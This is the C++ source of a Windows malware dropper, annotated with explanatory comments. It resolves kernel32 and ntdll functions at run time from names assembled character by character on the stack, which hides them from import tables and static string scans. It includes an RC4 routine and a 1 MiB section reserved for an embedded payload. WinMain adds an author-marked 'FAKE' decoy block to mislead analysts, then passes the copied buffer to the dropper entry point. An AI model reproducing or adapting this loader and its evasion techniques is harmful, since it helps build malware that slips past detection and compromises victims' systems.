vector-default/default.cpp
#ifndef UNICODE
#define UNICODE
#endif
#include <windows.h>
#include <stdio.h>
#include "DropperCode.h"
#include "DropperHeader.h"
#pragma comment(linker, "/SUBSYSTEM:WINDOWS")
// 1 MiB buffer carved into its own ".textbss" section and seeded with a single
// 0xdeadbeef marker. WinMain copies the whole array into fresh memory and passes
// it to DropperEntryPoint as a DropperHeader, so presumably a post-build step
// overwrites this region with the real payload — TODO confirm against the build
// tooling; nothing in this file checks whether the marker was ever replaced.
#pragma section(".textbss",read)
__declspec(allocate(".textbss"))
static ULONG pCooked[(1024*1024)/sizeof(ULONG)] = {0xdeadbeef};
// Function pointers populated by InitWinApi(). The typedefs come from the
// included Dropper*.h headers (not visible here). Because every routine is
// looked up through GetProcAddress at run time rather than linked, none of
// these names appear in the binary's import table; a reviewer or analyst has to
// rely on the stack-built name strings in InitWinApi or on run-time behaviour.
GETMODULEHANDLE pfn_GetModuleHandle;
LOADLIBRARYA pfn_LoadLibraryA;
GETPROCADDRESS pfn_GetProcAddress;
VIRTUALALLOC pfn_VirtualAlloc;
VIRTUALFREE pfn_VirtualFree;
GETMODULEFILENAMEA pfn_GetModuleFileNameA;
GETENVIRONMENTVARIABLEA pfn_GetEnvironmentVariableA;
GETFILEATTRIBUTESA pfn_GetFileAttributesA;
CREATEDIRECTORYA pfn_CreateDirectoryA;
SETCURRENTDIRECTORYA pfn_SetCurrentDirectoryA;
SETFILEATTRIBUTESA pfn_SetFileAttributesA;
CREATEFILEA pfn_CreateFileA;
GETLASTERROR pfn_GetLastError;
WRITEFILE pfn_WriteFile;
CLOSEHANDLE pfn_CloseHandle;
FREELIBRARY pfn_FreeLibrary;
DELETEFILEA pfn_DeleteFileA;
SWPRINTF pfn_swprintf;
GETCURRENTPROCESSID pfn_GetCurrentProcessId;
/*
 * Fill the file-scope pfn_* pointers by resolving each API at run time.
 *
 * resolveGetProcAddress() and resolveLoadLibrary() are defined elsewhere (not
 * visible here) and bootstrap the two routines everything else depends on.
 * Every name is assembled as a char-by-char stack array instead of a string
 * literal, so the API names do not exist as contiguous strings in the image's
 * data sections — the reason static string scans of this binary come up empty.
 *
 * No result is checked: a failed LoadLibraryA or GetProcAddress leaves the
 * corresponding pfn_* NULL, and the first caller to use it will fault.
 */
VOID InitWinApi()
{
HMODULE hKernel32, hNtDll;
// "kernel32" / "ntdll" without an extension; LoadLibraryA appends ".dll".
CHAR strKernel32[] = { 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', 0x0};
CHAR strNtDll[] = { 'n', 't', 'd', 'l', 'l', 0x0};
pfn_GetProcAddress = resolveGetProcAddress();
pfn_LoadLibraryA = resolveLoadLibrary();
hKernel32 = pfn_LoadLibraryA(strKernel32);
hNtDll = pfn_LoadLibraryA(strNtDll);
CHAR strVirtualAlloc[] = { 'V', 'i', 'r', 't', 'u', 'a', 'l', 'A', 'l', 'l', 'o', 'c', 0x0};
pfn_VirtualAlloc = (VIRTUALALLOC)pfn_GetProcAddress(hKernel32, strVirtualAlloc);
CHAR strVirtualFree[] = { 'V', 'i', 'r', 't', 'u', 'a', 'l', 'F', 'r', 'e', 'e', 0x0};
pfn_VirtualFree = (VIRTUALFREE)pfn_GetProcAddress(hKernel32, strVirtualFree);
CHAR strGetModuleFileNameA[] = { 'G', 'e', 't', 'M', 'o', 'd', 'u', 'l', 'e', 'F', 'i', 'l', 'e', 'N', 'a', 'm', 'e', 'A', 0x0};
pfn_GetModuleFileNameA = (GETMODULEFILENAMEA)pfn_GetProcAddress(hKernel32, strGetModuleFileNameA);
CHAR strGetEnvironmentVariableA[] = { 'G', 'e', 't', 'E', 'n', 'v', 'i', 'r', 'o', 'n', 'm', 'e', 'n', 't', 'V', 'a', 'r', 'i', 'a', 'b', 'l', 'e', 'A', 0x0};
pfn_GetEnvironmentVariableA = (GETENVIRONMENTVARIABLEA)pfn_GetProcAddress(hKernel32, strGetEnvironmentVariableA);
CHAR strGetFileAttributesA[] = { 'G', 'e', 't', 'F', 'i', 'l', 'e', 'A', 't', 't', 'r', 'i', 'b', 'u', 't', 'e', 's', 'A', 0x0};
pfn_GetFileAttributesA = (GETFILEATTRIBUTESA)pfn_GetProcAddress(hKernel32, strGetFileAttributesA);
CHAR strCreateDirectoryA[] = { 'C', 'r', 'e', 'a', 't', 'e', 'D', 'i', 'r', 'e', 'c', 't', 'o', 'r', 'y', 'A', 0x0};
pfn_CreateDirectoryA = (CREATEDIRECTORYA)pfn_GetProcAddress(hKernel32, strCreateDirectoryA);
CHAR strSetCurrentDirectoryA[] = { 'S', 'e', 't', 'C', 'u', 'r', 'r', 'e', 'n', 't', 'D', 'i', 'r', 'e', 'c', 't', 'o', 'r', 'y', 'A', 0x0};
pfn_SetCurrentDirectoryA = (SETCURRENTDIRECTORYA)pfn_GetProcAddress(hKernel32, strSetCurrentDirectoryA);
CHAR strSetFileAttributesA[] = { 'S', 'e', 't', 'F', 'i', 'l', 'e', 'A', 't', 't', 'r', 'i', 'b', 'u', 't', 'e', 's', 'A', 0x0};
pfn_SetFileAttributesA = (SETFILEATTRIBUTESA)pfn_GetProcAddress(hKernel32, strSetFileAttributesA);
CHAR strCreateFileA[] = { 'C', 'r', 'e', 'a', 't', 'e', 'F', 'i', 'l', 'e', 'A', 0x0};
pfn_CreateFileA = (CREATEFILEA)pfn_GetProcAddress(hKernel32, strCreateFileA);
CHAR strGetLastError[] = { 'G', 'e', 't', 'L', 'a', 's', 't', 'E', 'r', 'r', 'o', 'r', 0x0};
pfn_GetLastError = (GETLASTERROR)pfn_GetProcAddress(hKernel32, strGetLastError);
CHAR strWriteFile[] = { 'W', 'r', 'i', 't', 'e', 'F', 'i', 'l', 'e', 0x0};
pfn_WriteFile = (WRITEFILE)pfn_GetProcAddress(hKernel32, strWriteFile);
CHAR strCloseHandle[] = { 'C', 'l', 'o', 's', 'e', 'H', 'a', 'n', 'd', 'l', 'e', 0x0};
pfn_CloseHandle = (CLOSEHANDLE)pfn_GetProcAddress(hKernel32, strCloseHandle);
CHAR strFreeLibrary[] = { 'F', 'r', 'e', 'e', 'L', 'i', 'b', 'r', 'a', 'r', 'y', 0x0 };
pfn_FreeLibrary = (FREELIBRARY)pfn_GetProcAddress(hKernel32, strFreeLibrary);
CHAR strDeleteFileA[] = { 'D', 'e', 'l', 'e', 't', 'e', 'F', 'i', 'l', 'e', 'A', 0x0 };
pfn_DeleteFileA = (DELETEFILEA)pfn_GetProcAddress(hKernel32, strDeleteFileA);
// swprintf is the only routine taken from ntdll rather than kernel32.
CHAR strSwprintf[] = { 's', 'w', 'p', 'r', 'i', 'n', 't', 'f', 0x0 };
pfn_swprintf = (SWPRINTF)pfn_GetProcAddress(hNtDll, strSwprintf);
CHAR strGetCurrentProcessId[] = { 'G', 'e', 't', 'C', 'u', 'r', 'r', 'e', 'n', 't', 'P', 'r', 'o', 'c', 'e', 's', 's', 'I', 'd', 0x0 };
pfn_GetCurrentProcessId = (GETCURRENTPROCESSID)pfn_GetProcAddress(hKernel32, strGetCurrentProcessId);
// Note the name mismatch: the variable says GetModuleHandle but the string
// resolved is the ANSI "GetModuleHandleA" export.
CHAR strGetModuleHandle[] = { 'G', 'e', 't', 'M', 'o', 'd', 'u', 'l', 'e', 'H', 'a', 'n', 'd', 'l', 'e', 'A', 0x0 };
pfn_GetModuleHandle = (GETMODULEHANDLE)pfn_GetProcAddress(hKernel32, strGetModuleHandle);
}
/*
 * Stub: always returns NULL and ignores FileBuffer. Nothing in this file calls
 * it; the name suggests it once located a header appended to the executable's
 * end-of-file, but no such logic is present here.
 */
DropperHeader *GetEofData(LPVOID FileBuffer)
{
return (DropperHeader *)NULL;
}
/*
 * In-place RC4: key-schedule from key[0..keylen), discard the first `skip`
 * keystream bytes, then XOR the keystream over data[0..data_len). Because RC4
 * is symmetric the same call decrypts. S_SWAP is a macro defined elsewhere
 * (presumably swaps S[i] and S[j] — it is not visible here).
 *
 * Robustness gaps worth knowing when reading this:
 *  - the 256-byte state comes from pfn_VirtualAlloc and is never checked for
 *    NULL, so an allocation failure (or an uninitialised pfn_*) faults at S[i];
 *  - keylen == 0 is not rejected: kpos wraps to 0 immediately, so key[0] is
 *    read 256 times from a buffer that has no bytes;
 *  - the loop counter k is unsigned int while skip/data_len are size_t, so on
 *    64-bit builds a length above UINT_MAX would never terminate.
 */
void rc4_encrypt(
const unsigned char *key,
size_t keylen,
size_t skip,
unsigned char *data,
size_t data_len)
{
unsigned int i, j, k;
unsigned char *pos;
size_t kpos;
// State lives in a fresh page rather than on the stack; released at the end.
unsigned char *S = (unsigned char*) pfn_VirtualAlloc(NULL, 256, MEM_COMMIT, PAGE_READWRITE);
/* Setup RC4 state */
for (i = 0; i < 256; i++)
S[i] = i;
j = 0;
kpos = 0;
for (i = 0; i < 256; i++) {
j = (j + S[i] + key[kpos]) & 0xff;
kpos++;
if (kpos >= keylen)
kpos = 0;
S_SWAP(i, j);
}
/* Skip the start of the stream */
i = j = 0;
for (k = 0; k < skip; k++) {
i = (i + 1) & 0xff;
j = (j + S[i]) & 0xff;
S_SWAP(i, j);
}
/* Apply RC4 to data */
pos = data;
for (k = 0; k < data_len; k++) {
i = (i + 1) & 0xff;
j = (j + S[i]) & 0xff;
S_SWAP(i, j);
*pos++ ^= S[(S[i] + S[j]) & 0xff];
}
pfn_VirtualFree(S, 0, MEM_RELEASE);
}
/*
 * Entry point. Resolves the API table, optionally runs a decoy block, then
 * copies the embedded pCooked buffer into fresh memory and hands it to
 * DropperEntryPoint (defined elsewhere). hPrevInstance, lpCmdLine and nCmdShow
 * are unused. There is no return statement: if DropperEntryPoint ever returns,
 * the process exit code is unspecified (falling off the end of a non-void
 * function is undefined behaviour) — presumably the callee never returns, TODO
 * confirm.
 */
int CALLBACK WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
InitWinApi();
// FAKE FAKE FAKE
// Decoy block (the author's own FAKE markers). PID 4 is the System process on
// Windows, so a normally launched user-mode executable does not take this
// branch; the calls inside are benign-looking API usage whose results feed
// nothing. Because it is not expected to execute, its defects have no effect:
// the CreateThread handle is never closed, `dwOemId = 0x62814` is an
// assignment rather than a comparison, and the HKEY 0x40 passed to
// RegQueryValueEx is not a valid key. When triaging a binary built from this
// file, treat the block as padding and focus on the pfn_* path below.
if (pfn_GetCurrentProcessId() == 4)
{
STARTUPINFO sInfo;
MessageBox(NULL, L"Launching installer", L"Installer", 0);
GetStartupInfo(&sInfo);
if (sInfo.dwFlags == 12)
{
HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)GetDesktopWindow, NULL, 0, NULL);
RECT pRect;
if (GetClientRect(GetDesktopWindow(), &pRect))
MessageBox(NULL, L"Setting up window", L"Action succeded", 0);
}
ShowWindow(GetDesktopWindow(), SW_MAXIMIZE);
VirtualFree(VirtualAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_READWRITE), 0, MEM_RELEASE);
if (GetLastError() == 123)
MessageBox(NULL, L"Memory committed", L"Memory manager", 0);
ULONG uVersion;
LPWSTR pCmdLine = GetCommandLine();
if (pCmdLine[0] != L'c')
{
uVersion = GetVersion();
if (uVersion == 0x7812)
ExitProcess(123);
}
SYSTEM_INFO pSysInfo;
GetSystemInfo(&pSysInfo);
if (pSysInfo.dwOemId = 0x62814)
MessageBox(NULL, L"Uknown system detected", L"Compatibility check", 0);
DWORD pDummy;
if (RegQueryValueEx((HKEY)0x40, L"Start", &pDummy, 0, (LPBYTE)&pDummy, &pDummy) == ERROR_SUCCESS)
MessageBox(NULL, L"Program already installed", L"Installer", 0);
LCID pThreadLocale = GetThreadLocale();
if (pThreadLocale == 12)
MessageBox(NULL, L"Unsupported language", L"Error", 0);
}
// END FAKE FAKE FAKE
// Real path: a RW copy of the whole pCooked buffer, sized from the array, is
// handed to DropperEntryPoint. The allocation is not checked for NULL, and the
// 0xdeadbeef placeholder marker is not checked either, so an unpatched build
// passes a buffer of mostly zeros straight through. _MEMCPY_ is defined
// elsewhere (presumably a local memcpy replacement; not visible here).
DropperHeader *pDropperHeader = (DropperHeader *)pfn_VirtualAlloc(NULL, sizeof(pCooked), MEM_COMMIT, PAGE_READWRITE);
_MEMCPY_(pDropperHeader, pCooked, sizeof(pCooked));
DropperEntryPoint(pDropperHeader);
}